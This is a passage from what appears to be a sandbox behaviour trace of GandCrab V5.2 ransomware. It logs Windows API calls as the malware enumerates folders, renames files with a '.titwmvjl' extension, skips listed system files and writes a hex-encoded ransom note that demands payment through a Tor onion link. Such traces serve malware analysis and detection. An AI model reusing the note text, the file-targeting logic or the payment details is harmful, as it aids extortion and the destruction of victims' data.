x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.803] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0069.804] CloseHandle (hObject=0x2bc) returned 1 [0069.804] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.804] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.804] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x79)) [0069.804] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.804] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.804] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.805] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\d2ca4a09d2ca4deb61a.lock") returned 80 [0069.805] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\linguistics\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0069.805] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.806] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.806] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\") returned 56 [0069.806] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\*" [0069.806] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503538 [0069.806] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.806] FindNextFileW (in: hFindFile=0x503538, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.806] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.806] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.806] FindNextFileW (in: hFindFile=0x503538, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.806] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.806] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.806] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\d2ca4a09d2ca4deb61a.lock" [0069.806] lstrlenW (lpString=".titwmvjl") returned 9 [0069.806] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\d2ca4a09d2ca4deb61a.lock") returned 80 [0069.806] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.806] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 89 [0069.806] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\d2ca4a09d2ca4deb61a.lock") returned 80 [0069.806] lstrlenW (lpString=".lock") returned 5 [0069.806] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.807] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.807] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.807] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.807] FindNextFileW (in: hFindFile=0x503538, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.807] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.807] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.807] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\TITWMVJL-DECRYPT.txt" [0069.807] lstrlenW (lpString=".titwmvjl") returned 9 [0069.807] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\TITWMVJL-DECRYPT.txt") returned 76 [0069.807] VirtualAlloc (lpAddress=0x0, dwSize=0xd8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.807] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 85 [0069.807] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\TITWMVJL-DECRYPT.txt") returned 76 [0069.807] lstrlenW (lpString=".txt") returned 4 [0069.807] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.807] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.808] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.808] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.808] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\TITWMVJL-DECRYPT.txt") returned 76 [0069.808] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\TITWMVJL-DECRYPT.txt") returned 76 [0069.808] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.808] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.808] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.808] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.808] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.808] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.808] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.808] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.808] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.808] FindNextFileW (in: hFindFile=0x503538, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0069.808] FindClose (in: hFindFile=0x503538 | out: hFindFile=0x503538) returned 1 [0069.808] CloseHandle (hObject=0x2bc) returned 1 [0069.809] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0069.809] lstrcmpW (lpString1="LogTransport2", lpString2=".") returned 1 [0069.809] lstrcmpW (lpString1="LogTransport2", lpString2="..") returned 1 [0069.809] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="LogTransport2" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2" [0069.809] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\" [0069.809] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.809] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.809] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.809] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.809] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.809] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.809] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.809] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.810] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.810] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.810] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.810] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\\\TITWMVJL-DECRYPT.txt") returned 79 [0069.810] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\logtransport2\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0069.811] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\